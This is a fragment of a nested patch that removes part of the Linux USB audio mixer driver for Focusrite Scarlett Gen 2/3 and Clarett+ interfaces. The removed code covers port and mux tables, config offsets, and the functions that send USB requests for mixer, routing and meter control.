+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,     0,  8 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 14 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_ADAT,     0,  4 },
+-		{ SCARLETT2_PORT_TYPE_MIX,      0, 18 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0,  8 },
+-		{ 0,                            0,  0 },
+-	}, {
+-		{ SCARLETT2_PORT_TYPE_PCM,      0, 12 },
+-		{ SCARLETT2_PORT_TYPE_ANALOGUE, 0, 10 },
+-		{ SCARLETT2_PORT_TYPE_SPDIF,    0,  2 },
+-		{ SCARLETT2_PORT_TYPE_NONE,     0, 22 },
+-		{ 0,                            0,  0 },
+-	} },
+-};
+-
+-static const struct scarlett2_device_info *scarlett2_devices[] = {
+-	/* Supported Gen 2 devices */
+-	&s6i6_gen2_info,
+-	&s18i8_gen2_info,
+-	&s18i20_gen2_info,
+-
+-	/* Supported Gen 3 devices */
+-	&solo_gen3_info,
+-	&s2i2_gen3_info,
+-	&s4i4_gen3_info,
+-	&s8i6_gen3_info,
+-	&s18i8_gen3_info,
+-	&s18i20_gen3_info,
+-
+-	/* Supported Clarett+ devices */
+-	&clarett_8pre_info,
+-
+-	/* End of list */
+-	NULL
+-};
+-
+-/* get the starting port index number for a given port type/direction */
+-static int scarlett2_get_port_start_num(
+-	const int port_count[][SCARLETT2_PORT_DIRNS],
+-	int direction, int port_type)
+-{
+-	int i, num = 0;
+-
+-	for (i = 0; i < port_type; i++)
+-		num += port_count[i][direction];
+-
+-	return num;
+-}
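+-
+-/* For example, with the 18i20 Gen 2 port counts, the starting input
+- * number for SCARLETT2_PORT_TYPE_PCM is 1 (NONE) + 8 (ANALOGUE) +
+- * 2 (SPDIF) + 8 (ADAT) + 10 (MIX) = 29.
+- */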
+-
+-/*** USB Interactions ***/
+-
+-/* Notifications from the interface */
+-#define SCARLETT2_USB_NOTIFY_SYNC          0x00000008
+-#define SCARLETT2_USB_NOTIFY_DIM_MUTE      0x00200000
+-#define SCARLETT2_USB_NOTIFY_MONITOR       0x00400000
+-#define SCARLETT2_USB_NOTIFY_INPUT_OTHER   0x00800000
+-#define SCARLETT2_USB_NOTIFY_MONITOR_OTHER 0x01000000
+-
+-/* Commands for sending/receiving requests/responses */
+-#define SCARLETT2_USB_CMD_INIT 0
+-#define SCARLETT2_USB_CMD_REQ  2
+-#define SCARLETT2_USB_CMD_RESP 3
+-
+-#define SCARLETT2_USB_INIT_1    0x00000000
+-#define SCARLETT2_USB_INIT_2    0x00000002
+-#define SCARLETT2_USB_GET_METER 0x00001001
+-#define SCARLETT2_USB_GET_MIX   0x00002001
+-#define SCARLETT2_USB_SET_MIX   0x00002002
+-#define SCARLETT2_USB_GET_MUX   0x00003001
+-#define SCARLETT2_USB_SET_MUX   0x00003002
+-#define SCARLETT2_USB_GET_SYNC  0x00006004
+-#define SCARLETT2_USB_GET_DATA  0x00800000
+-#define SCARLETT2_USB_SET_DATA  0x00800001
+-#define SCARLETT2_USB_DATA_CMD  0x00800002
+-
+-#define SCARLETT2_USB_CONFIG_SAVE 6
+-
+-#define SCARLETT2_USB_VOLUME_STATUS_OFFSET 0x31
+-#define SCARLETT2_USB_METER_LEVELS_GET_MAGIC 1
+-
+-/* volume status is read together (matches scarlett2_config_items[1]) */
+-struct scarlett2_usb_volume_status {
+-	/* dim/mute buttons */
+-	u8 dim_mute[SCARLETT2_DIM_MUTE_COUNT];
+-
+-	u8 pad1;
+-
+-	/* software volume setting */
+-	s16 sw_vol[SCARLETT2_ANALOGUE_MAX];
+-
+-	/* actual volume of output inc. dim (-18dB) */
+-	s16 hw_vol[SCARLETT2_ANALOGUE_MAX];
+-
+-	/* internal mute buttons */
+-	u8 mute_switch[SCARLETT2_ANALOGUE_MAX];
+-
+-	/* sw (0) or hw (1) controlled */
+-	u8 sw_hw_switch[SCARLETT2_ANALOGUE_MAX];
+-
+-	u8 pad3[6];
+-
+-	/* front panel volume knob */
+-	s16 master_vol;
+-} __packed;
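+-
+-/* Reading this struct at SCARLETT2_USB_VOLUME_STATUS_OFFSET (0x31)
+- * lines its members up with the Gen 2/3 config items below:
+- * dim_mute at 0x31 (DIM_MUTE), sw_vol at 0x34 (LINE_OUT_VOLUME),
+- * mute_switch at 0x5c (MUTE_SWITCH), and sw_hw_switch at 0x66
+- * (SW_HW_SWITCH).
+- */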
+-
+-/* Configuration parameters that can be read and written */
+-enum {
+-	SCARLETT2_CONFIG_DIM_MUTE = 0,
+-	SCARLETT2_CONFIG_LINE_OUT_VOLUME = 1,
+-	SCARLETT2_CONFIG_MUTE_SWITCH = 2,
+-	SCARLETT2_CONFIG_SW_HW_SWITCH = 3,
+-	SCARLETT2_CONFIG_LEVEL_SWITCH = 4,
+-	SCARLETT2_CONFIG_PAD_SWITCH = 5,
+-	SCARLETT2_CONFIG_MSD_SWITCH = 6,
+-	SCARLETT2_CONFIG_AIR_SWITCH = 7,
+-	SCARLETT2_CONFIG_STANDALONE_SWITCH = 8,
+-	SCARLETT2_CONFIG_PHANTOM_SWITCH = 9,
+-	SCARLETT2_CONFIG_PHANTOM_PERSISTENCE = 10,
+-	SCARLETT2_CONFIG_DIRECT_MONITOR = 11,
+-	SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH = 12,
+-	SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE = 13,
+-	SCARLETT2_CONFIG_TALKBACK_MAP = 14,
+-	SCARLETT2_CONFIG_COUNT = 15
+-};
+-
+-/* Location, size, and activation command number for the configuration
+- * parameters. Size is in bits and may be 1, 8, or 16.
+- */
+-struct scarlett2_config {
+-	u8 offset;
+-	u8 size;
+-	u8 activate;
+-};
+-
+-static const struct scarlett2_config
+-	scarlett2_config_items[SCARLETT2_CONFIG_SET_COUNT]
+-			      [SCARLETT2_CONFIG_COUNT] =
+-
+-/* Devices without a mixer (Gen 3 Solo and 2i2) */
+-{ {
+-	[SCARLETT2_CONFIG_MSD_SWITCH] = {
+-		.offset = 0x04, .size = 8, .activate = 6 },
+-
+-	[SCARLETT2_CONFIG_PHANTOM_PERSISTENCE] = {
+-		.offset = 0x05, .size = 8, .activate = 6 },
+-
+-	[SCARLETT2_CONFIG_PHANTOM_SWITCH] = {
+-		.offset = 0x06, .size = 8, .activate = 3 },
+-
+-	[SCARLETT2_CONFIG_DIRECT_MONITOR] = {
+-		.offset = 0x07, .size = 8, .activate = 4 },
+-
+-	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
+-		.offset = 0x08, .size = 1, .activate = 7 },
+-
+-	[SCARLETT2_CONFIG_AIR_SWITCH] = {
+-		.offset = 0x09, .size = 1, .activate = 8 },
+-
+-/* Gen 2 devices: 6i6, 18i8, 18i20 */
+-}, {
+-	[SCARLETT2_CONFIG_DIM_MUTE] = {
+-		.offset = 0x31, .size = 8, .activate = 2 },
+-
+-	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
+-		.offset = 0x34, .size = 16, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
+-		.offset = 0x5c, .size = 8, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
+-		.offset = 0x66, .size = 8, .activate = 3 },
+-
+-	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
+-		.offset = 0x7c, .size = 8, .activate = 7 },
+-
+-	[SCARLETT2_CONFIG_PAD_SWITCH] = {
+-		.offset = 0x84, .size = 8, .activate = 8 },
+-
+-	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
+-		.offset = 0x8d, .size = 8, .activate = 6 },
+-
+-/* Gen 3 devices: 4i4, 8i6, 18i8, 18i20 */
+-}, {
+-	[SCARLETT2_CONFIG_DIM_MUTE] = {
+-		.offset = 0x31, .size = 8, .activate = 2 },
+-
+-	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
+-		.offset = 0x34, .size = 16, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
+-		.offset = 0x5c, .size = 8, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
+-		.offset = 0x66, .size = 8, .activate = 3 },
+-
+-	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
+-		.offset = 0x7c, .size = 8, .activate = 7 },
+-
+-	[SCARLETT2_CONFIG_PAD_SWITCH] = {
+-		.offset = 0x84, .size = 8, .activate = 8 },
+-
+-	[SCARLETT2_CONFIG_AIR_SWITCH] = {
+-		.offset = 0x8c, .size = 8, .activate = 8 },
+-
+-	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
+-		.offset = 0x95, .size = 8, .activate = 6 },
+-
+-	[SCARLETT2_CONFIG_PHANTOM_SWITCH] = {
+-		.offset = 0x9c, .size = 1, .activate = 8 },
+-
+-	[SCARLETT2_CONFIG_MSD_SWITCH] = {
+-		.offset = 0x9d, .size = 8, .activate = 6 },
+-
+-	[SCARLETT2_CONFIG_PHANTOM_PERSISTENCE] = {
+-		.offset = 0x9e, .size = 8, .activate = 6 },
+-
+-	[SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH] = {
+-		.offset = 0x9f, .size = 1, .activate = 10 },
+-
+-	[SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE] = {
+-		.offset = 0xa0, .size = 1, .activate = 10 },
+-
+-	[SCARLETT2_CONFIG_TALKBACK_MAP] = {
+-		.offset = 0xb0, .size = 16, .activate = 10 },
+-
+-/* Clarett+ 8Pre */
+-}, {
+-	[SCARLETT2_CONFIG_DIM_MUTE] = {
+-		.offset = 0x31, .size = 8, .activate = 2 },
+-
+-	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
+-		.offset = 0x34, .size = 16, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
+-		.offset = 0x5c, .size = 8, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
+-		.offset = 0x66, .size = 8, .activate = 3 },
+-
+-	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
+-		.offset = 0x7c, .size = 8, .activate = 7 },
+-
+-	[SCARLETT2_CONFIG_AIR_SWITCH] = {
+-		.offset = 0x95, .size = 8, .activate = 8 },
+-
+-	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
+-		.offset = 0x8d, .size = 8, .activate = 6 },
+-} };
+-
+-/* proprietary request/response format */
+-struct scarlett2_usb_packet {
+-	__le32 cmd;
+-	__le16 size;
+-	__le16 seq;
+-	__le32 error;
+-	__le32 pad;
+-	u8 data[];
+-};
+-
+-static void scarlett2_fill_request_header(struct scarlett2_data *private,
+-					  struct scarlett2_usb_packet *req,
+-					  u32 cmd, u16 req_size)
+-{
+-	/* sequence must go up by 1 for each request */
+-	u16 seq = private->scarlett2_seq++;
+-
+-	req->cmd = cpu_to_le32(cmd);
+-	req->size = cpu_to_le16(req_size);
+-	req->seq = cpu_to_le16(seq);
+-	req->error = 0;
+-	req->pad = 0;
+-}
+-
+-static int scarlett2_usb_tx(struct usb_device *dev, int interface,
+-			    void *buf, u16 size)
+-{
+-	return snd_usb_ctl_msg(dev, usb_sndctrlpipe(dev, 0),
+-			SCARLETT2_USB_CMD_REQ,
+-			USB_RECIP_INTERFACE | USB_TYPE_CLASS | USB_DIR_OUT,
+-			0, interface, buf, size);
+-}
+-
+-static int scarlett2_usb_rx(struct usb_device *dev, int interface,
+-			    u32 usb_req, void *buf, u16 size)
+-{
+-	return snd_usb_ctl_msg(dev, usb_rcvctrlpipe(dev, 0),
+-			usb_req,
+-			USB_RECIP_INTERFACE | USB_TYPE_CLASS | USB_DIR_IN,
+-			0, interface, buf, size);
+-}
+-
+-/* Send a proprietary format request to the Scarlett interface */
+-static int scarlett2_usb(
+-	struct usb_mixer_interface *mixer, u32 cmd,
+-	void *req_data, u16 req_size, void *resp_data, u16 resp_size)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	struct usb_device *dev = mixer->chip->dev;
+-	struct scarlett2_usb_packet *req, *resp = NULL;
+-	size_t req_buf_size = struct_size(req, data, req_size);
+-	size_t resp_buf_size = struct_size(resp, data, resp_size);
+-	int err;
+-
+-	req = kmalloc(req_buf_size, GFP_KERNEL);
+-	if (!req) {
+-		err = -ENOMEM;
+-		goto error;
+-	}
+-
+-	resp = kmalloc(resp_buf_size, GFP_KERNEL);
+-	if (!resp) {
+-		err = -ENOMEM;
+-		goto error;
+-	}
+-
+-	mutex_lock(&private->usb_mutex);
+-
+-	/* build request message and send it */
+-
+-	scarlett2_fill_request_header(private, req, cmd, req_size);
+-
+-	if (req_size)
+-		memcpy(req->data, req_data, req_size);
+-
+-	err = scarlett2_usb_tx(dev, private->bInterfaceNumber,
+-			       req, req_buf_size);
+-
+-	if (err != req_buf_size) {
+-		usb_audio_err(
+-			mixer->chip,
+-			"Scarlett Gen 2/3 USB request result cmd %x was %d\n",
+-			cmd, err);
+-		err = -EINVAL;
+-		goto unlock;
+-	}
+-
+-	/* send a second message to get the response */
+-
+-	err = scarlett2_usb_rx(dev, private->bInterfaceNumber,
+-			       SCARLETT2_USB_CMD_RESP,
+-			       resp, resp_buf_size);
+-
+-	/* validate the response */
+-
+-	if (err != resp_buf_size) {
+-		usb_audio_err(
+-			mixer->chip,
+-			"Scarlett Gen 2/3 USB response result cmd %x was %d "
+-			"expected %zu\n",
+-			cmd, err, resp_buf_size);
+-		err = -EINVAL;
+-		goto unlock;
+-	}
+-
+-	/* cmd/seq/size should match except when initialising
+-	 * seq sent = 1, response = 0
+-	 */
+-	if (resp->cmd != req->cmd ||
+-	    (resp->seq != req->seq &&
+-		(le16_to_cpu(req->seq) != 1 || resp->seq != 0)) ||
+-	    resp_size != le16_to_cpu(resp->size) ||
+-	    resp->error ||
+-	    resp->pad) {
+-		usb_audio_err(
+-			mixer->chip,
+-			"Scarlett Gen 2/3 USB invalid response; "
+-			   "cmd tx/rx %d/%d seq %d/%d size %d/%d "
+-			   "error %d pad %d\n",
+-			le32_to_cpu(req->cmd), le32_to_cpu(resp->cmd),
+-			le16_to_cpu(req->seq), le16_to_cpu(resp->seq),
+-			resp_size, le16_to_cpu(resp->size),
+-			le32_to_cpu(resp->error),
+-			le32_to_cpu(resp->pad));
+-		err = -EINVAL;
+-		goto unlock;
+-	}
+-
+-	if (resp_data && resp_size > 0)
+-		memcpy(resp_data, resp->data, resp_size);
+-
+-unlock:
+-	mutex_unlock(&private->usb_mutex);
+-error:
+-	kfree(req);
+-	kfree(resp);
+-	return err;
+-}
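+-
+-/* For example, a SCARLETT2_USB_GET_DATA request for a single byte
+- * carries an 8-byte payload (__le32 offset plus __le32 size), so
+- * req_buf_size is the 16-byte header plus 8 bytes, and the expected
+- * response is the 16-byte header plus the one requested data byte.
+- */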
+-
+-/* Send a USB message to get data; result placed in *buf */
+-static int scarlett2_usb_get(
+-	struct usb_mixer_interface *mixer,
+-	int offset, void *buf, int size)
+-{
+-	struct {
+-		__le32 offset;
+-		__le32 size;
+-	} __packed req;
+-
+-	req.offset = cpu_to_le32(offset);
+-	req.size = cpu_to_le32(size);
+-	return scarlett2_usb(mixer, SCARLETT2_USB_GET_DATA,
+-			     &req, sizeof(req), buf, size);
+-}
+-
+-/* Send a USB message to get configuration parameters; result placed in *buf */
+-static int scarlett2_usb_get_config(
+-	struct usb_mixer_interface *mixer,
+-	int config_item_num, int count, void *buf)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const struct scarlett2_config *config_item =
+-		&scarlett2_config_items[info->config_set][config_item_num];
+-	int size, err, i;
+-	u8 *buf_8;
+-	u8 value;
+-
+-	/* For byte-sized parameters, retrieve directly into buf */
+-	if (config_item->size >= 8) {
+-		size = config_item->size / 8 * count;
+-		err = scarlett2_usb_get(mixer, config_item->offset, buf, size);
+-		if (err < 0)
+-			return err;
+-		if (size == 2) {
+-			u16 *buf_16 = buf;
+-
+-			for (i = 0; i < count; i++, buf_16++)
+-				*buf_16 = le16_to_cpu(*(__le16 *)buf_16);
+-		}
+-		return 0;
+-	}
+-
+-	/* For bit-sized parameters, retrieve into value */
+-	err = scarlett2_usb_get(mixer, config_item->offset, &value, 1);
+-	if (err < 0)
+-		return err;
+-
+-	/* then unpack from value into buf[] */
+-	buf_8 = buf;
+-	for (i = 0; i < 8 && i < count; i++, value >>= 1)
+-		*buf_8++ = value & 1;
+-
+-	return 0;
+-}
+-
+-/* Send SCARLETT2_USB_DATA_CMD SCARLETT2_USB_CONFIG_SAVE */
+-static void scarlett2_config_save(struct usb_mixer_interface *mixer)
+-{
+-	__le32 req = cpu_to_le32(SCARLETT2_USB_CONFIG_SAVE);
+-
+-	int err = scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
+-				&req, sizeof(u32),
+-				NULL, 0);
+-	if (err < 0)
+-		usb_audio_err(mixer->chip, "config save failed: %d\n", err);
+-}
+-
+-/* Delayed work to save config */
+-static void scarlett2_config_save_work(struct work_struct *work)
+-{
+-	struct scarlett2_data *private =
+-		container_of(work, struct scarlett2_data, work.work);
+-
+-	scarlett2_config_save(private->mixer);
+-}
+-
+-/* Send a USB message to set a SCARLETT2_CONFIG_* parameter */
+-static int scarlett2_usb_set_config(
+-	struct usb_mixer_interface *mixer,
+-	int config_item_num, int index, int value)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const struct scarlett2_config *config_item =
+-	       &scarlett2_config_items[info->config_set][config_item_num];
+-	struct {
+-		__le32 offset;
+-		__le32 bytes;
+-		__le32 value;
+-	} __packed req;
+-	__le32 req2;
+-	int offset, size;
+-	int err;
+-
+-	/* Cancel any pending NVRAM save */
+-	cancel_delayed_work_sync(&private->work);
+-
+-	/* Convert config_item->size in bits to size in bytes and
+-	 * calculate offset
+-	 */
+-	if (config_item->size >= 8) {
+-		size = config_item->size / 8;
+-		offset = config_item->offset + index * size;
+-
+-	/* If updating a bit, retrieve the old value, set/clear the
+-	 * bit as needed, and update value
+-	 */
+-	} else {
+-		u8 tmp;
+-
+-		size = 1;
+-		offset = config_item->offset;
+-
+-		err = scarlett2_usb_get(mixer, offset, &tmp, 1);
+-		if (err < 0)
+-			return err;
+-
+-		if (value)
+-			tmp |= (1 << index);
+-		else
+-			tmp &= ~(1 << index);
+-
+-		value = tmp;
+-	}
+-
+-	/* Send the configuration parameter data */
+-	req.offset = cpu_to_le32(offset);
+-	req.bytes = cpu_to_le32(size);
+-	req.value = cpu_to_le32(value);
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_SET_DATA,
+-			    &req, sizeof(u32) * 2 + size,
+-			    NULL, 0);
+-	if (err < 0)
+-		return err;
+-
+-	/* Activate the change */
+-	req2 = cpu_to_le32(config_item->activate);
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
+-			    &req2, sizeof(req2), NULL, 0);
+-	if (err < 0)
+-		return err;
+-
+-	/* Schedule the change to be written to NVRAM */
+-	if (config_item->activate != SCARLETT2_USB_CONFIG_SAVE)
+-		schedule_delayed_work(&private->work, msecs_to_jiffies(2000));
+-
+-	return 0;
+-}
+-
+-/* Send a USB message to get sync status; result placed in *sync */
+-static int scarlett2_usb_get_sync_status(
+-	struct usb_mixer_interface *mixer,
+-	u8 *sync)
+-{
+-	__le32 data;
+-	int err;
+-
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_SYNC,
+-			    NULL, 0, &data, sizeof(data));
+-	if (err < 0)
+-		return err;
+-
+-	*sync = !!data;
+-	return 0;
+-}
+-
+-/* Send a USB message to get volume status; result placed in *buf */
+-static int scarlett2_usb_get_volume_status(
+-	struct usb_mixer_interface *mixer,
+-	struct scarlett2_usb_volume_status *buf)
+-{
+-	return scarlett2_usb_get(mixer, SCARLETT2_USB_VOLUME_STATUS_OFFSET,
+-				 buf, sizeof(*buf));
+-}
+-
+-/* Send a USB message to get the volumes for all inputs of one mix
+- * and put the values into private->mix[]
+- */
+-static int scarlett2_usb_get_mix(struct usb_mixer_interface *mixer,
+-				 int mix_num)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	int num_mixer_in =
+-		info->port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
+-	int err, i, j, k;
+-
+-	struct {
+-		__le16 mix_num;
+-		__le16 count;
+-	} __packed req;
+-
+-	__le16 data[SCARLETT2_INPUT_MIX_MAX];
+-
+-	req.mix_num = cpu_to_le16(mix_num);
+-	req.count = cpu_to_le16(num_mixer_in);
+-
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_MIX,
+-			    &req, sizeof(req),
+-			    data, num_mixer_in * sizeof(u16));
+-	if (err < 0)
+-		return err;
+-
+-	for (i = 0, j = mix_num * num_mixer_in; i < num_mixer_in; i++, j++) {
+-		u16 mixer_value = le16_to_cpu(data[i]);
+-
+-		for (k = 0; k < SCARLETT2_MIXER_VALUE_COUNT; k++)
+-			if (scarlett2_mixer_values[k] >= mixer_value)
+-				break;
+-		if (k == SCARLETT2_MIXER_VALUE_COUNT)
+-			k = SCARLETT2_MIXER_MAX_VALUE;
+-		private->mix[j] = k;
+-	}
+-
+-	return 0;
+-}
+-
+-/* Send a USB message to set the volumes for all inputs of one mix
+- * (values obtained from private->mix[])
+- */
+-static int scarlett2_usb_set_mix(struct usb_mixer_interface *mixer,
+-				 int mix_num)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	struct {
+-		__le16 mix_num;
+-		__le16 data[SCARLETT2_INPUT_MIX_MAX];
+-	} __packed req;
+-
+-	int i, j;
+-	int num_mixer_in =
+-		info->port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
+-
+-	req.mix_num = cpu_to_le16(mix_num);
+-
+-	for (i = 0, j = mix_num * num_mixer_in; i < num_mixer_in; i++, j++)
+-		req.data[i] = cpu_to_le16(
+-			scarlett2_mixer_values[private->mix[j]]
+-		);
+-
+-	return scarlett2_usb(mixer, SCARLETT2_USB_SET_MIX,
+-			     &req, (num_mixer_in + 1) * sizeof(u16),
+-			     NULL, 0);
+-}
+-
+-/* Convert a port number index (per info->port_count) to a hardware ID */
+-static u32 scarlett2_mux_src_num_to_id(
+-	const int port_count[][SCARLETT2_PORT_DIRNS], int num)
+-{
+-	int port_type;
+-
+-	for (port_type = 0;
+-	     port_type < SCARLETT2_PORT_TYPE_COUNT;
+-	     port_type++) {
+-		if (num < port_count[port_type][SCARLETT2_PORT_IN])
+-			return scarlett2_ports[port_type].id | num;
+-		num -= port_count[port_type][SCARLETT2_PORT_IN];
+-	}
+-
+-	/* Oops */
+-	return 0;
+-}
+-
+-/* Convert a hardware ID to a port number index */
+-static u32 scarlett2_mux_id_to_num(
+-	const int port_count[][SCARLETT2_PORT_DIRNS], int direction, u32 id)
+-{
+-	int port_type;
+-	int port_num = 0;
+-
+-	for (port_type = 0;
+-	     port_type < SCARLETT2_PORT_TYPE_COUNT;
+-	     port_type++) {
+-		int base = scarlett2_ports[port_type].id;
+-		int count = port_count[port_type][direction];
+-
+-		if (id >= base && id < base + count)
+-			return port_num + id - base;
+-		port_num += count;
+-	}
+-
+-	/* Oops */
+-	return -1;
+-}
+-
+-/* Convert one mux entry from the interface and load into private->mux[] */
+-static void scarlett2_usb_populate_mux(struct scarlett2_data *private,
+-				       u32 mux_entry)
+-{
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-
+-	int dst_idx, src_idx;
+-
+-	dst_idx = scarlett2_mux_id_to_num(port_count, SCARLETT2_PORT_OUT,
+-					  mux_entry & 0xFFF);
+-	if (dst_idx < 0)
+-		return;
+-
+-	if (dst_idx >= private->num_mux_dsts) {
+-		usb_audio_err(private->mixer->chip,
+-			"BUG: scarlett2_mux_id_to_num(%06x, OUT): %d >= %d",
+-			mux_entry, dst_idx, private->num_mux_dsts);
+-		return;
+-	}
+-
+-	src_idx = scarlett2_mux_id_to_num(port_count, SCARLETT2_PORT_IN,
+-					  mux_entry >> 12);
+-	if (src_idx < 0)
+-		return;
+-
+-	if (src_idx >= private->num_mux_srcs) {
+-		usb_audio_err(private->mixer->chip,
+-			"BUG: scarlett2_mux_id_to_num(%06x, IN): %d >= %d",
+-			mux_entry, src_idx, private->num_mux_srcs);
+-		return;
+-	}
+-
+-	private->mux[dst_idx] = src_idx;
+-}
+-
+-/* Send USB message to get mux inputs and then populate private->mux[] */
+-static int scarlett2_usb_get_mux(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	int count = private->num_mux_dsts;
+-	int err, i;
+-
+-	struct {
+-		__le16 num;
+-		__le16 count;
+-	} __packed req;
+-
+-	__le32 data[SCARLETT2_MUX_MAX];
+-
+-	private->mux_updated = 0;
+-
+-	req.num = 0;
+-	req.count = cpu_to_le16(count);
+-
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_MUX,
+-			    &req, sizeof(req),
+-			    data, count * sizeof(u32));
+-	if (err < 0)
+-		return err;
+-
+-	for (i = 0; i < count; i++)
+-		scarlett2_usb_populate_mux(private, le32_to_cpu(data[i]));
+-
+-	return 0;
+-}
+-
+-/* Send USB messages to set mux inputs */
+-static int scarlett2_usb_set_mux(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int table;
+-
+-	struct {
+-		__le16 pad;
+-		__le16 num;
+-		__le32 data[SCARLETT2_MUX_MAX];
+-	} __packed req;
+-
+-	req.pad = 0;
+-
+-	/* set mux settings for each rate */
+-	for (table = 0; table < SCARLETT2_MUX_TABLES; table++) {
+-		const struct scarlett2_mux_entry *entry;
+-
+-		/* i counts over the output array */
+-		int i = 0, err;
+-
+-		req.num = cpu_to_le16(table);
+-
+-		/* loop through each entry */
+-		for (entry = info->mux_assignment[table];
+-		     entry->count;
+-		     entry++) {
+-			int j;
+-			int port_type = entry->port_type;
+-			int port_idx = entry->start;
+-			int mux_idx = scarlett2_get_port_start_num(port_count,
+-				SCARLETT2_PORT_OUT, port_type) + port_idx;
+-			int dst_id = scarlett2_ports[port_type].id + port_idx;
+-
+-			/* Empty slots */
+-			if (!dst_id) {
+-				for (j = 0; j < entry->count; j++)
+-					req.data[i++] = 0;
+-				continue;
+-			}
+-
+-			/* Non-empty mux slots use the lower 12 bits
+-			 * for the destination and next 12 bits for
+-			 * the source
+-			 */
+-			for (j = 0; j < entry->count; j++) {
+-				int src_id = scarlett2_mux_src_num_to_id(
+-					port_count, private->mux[mux_idx++]);
+-				req.data[i++] = cpu_to_le32(dst_id |
+-							    src_id << 12);
+-				dst_id++;
+-			}
+-		}
+-
+-		err = scarlett2_usb(mixer, SCARLETT2_USB_SET_MUX,
+-				    &req, (i + 1) * sizeof(u32),
+-				    NULL, 0);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-/* Send USB message to get meter levels */
+-static int scarlett2_usb_get_meter_levels(struct usb_mixer_interface *mixer,
+-					  u16 num_meters, u16 *levels)
+-{
+-	struct {
+-		__le16 pad;
+-		__le16 num_meters;
+-		__le32 magic;
+-	} __packed req;
+-	u32 resp[SCARLETT2_MAX_METERS];
+-	int i, err;
+-
+-	req.pad = 0;
+-	req.num_meters = cpu_to_le16(num_meters);
+-	req.magic = cpu_to_le32(SCARLETT2_USB_METER_LEVELS_GET_MAGIC);
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_METER,
+-			    &req, sizeof(req), resp, num_meters * sizeof(u32));
+-	if (err < 0)
+-		return err;
+-
+-	/* copy, convert to u16 */
+-	for (i = 0; i < num_meters; i++)
+-		levels[i] = resp[i];
+-
+-	return 0;
+-}
+-
+-/*** Control Functions ***/
+-
+-/* helper function to create a new control */
+-static int scarlett2_add_new_ctl(struct usb_mixer_interface *mixer,
+-				 const struct snd_kcontrol_new *ncontrol,
+-				 int index, int channels, const char *name,
+-				 struct snd_kcontrol **kctl_return)
+-{
+-	struct snd_kcontrol *kctl;
+-	struct usb_mixer_elem_info *elem;
+-	int err;
+-
+-	elem = kzalloc(sizeof(*elem), GFP_KERNEL);
+-	if (!elem)
+-		return -ENOMEM;
+-
+-	/* We set USB_MIXER_BESPOKEN type, so that the core USB mixer code
+-	 * ignores them for resume and other operations.
+-	 * Also, the head.id field is set to 0, as we don't use this field.
+-	 */
+-	elem->head.mixer = mixer;
+-	elem->control = index;
+-	elem->head.id = 0;
+-	elem->channels = channels;
+-	elem->val_type = USB_MIXER_BESPOKEN;
+-
+-	kctl = snd_ctl_new1(ncontrol, elem);
+-	if (!kctl) {
+-		kfree(elem);
+-		return -ENOMEM;
+-	}
+-	kctl->private_free = snd_usb_mixer_elem_free;
+-
+-	strscpy(kctl->id.name, name, sizeof(kctl->id.name));
+-
+-	err = snd_usb_mixer_add_control(&elem->head, kctl);
+-	if (err < 0)
+-		return err;
+-
+-	if (kctl_return)
+-		*kctl_return = kctl;
+-
+-	return 0;
+-}
+-
+-/*** Sync Control ***/
+-
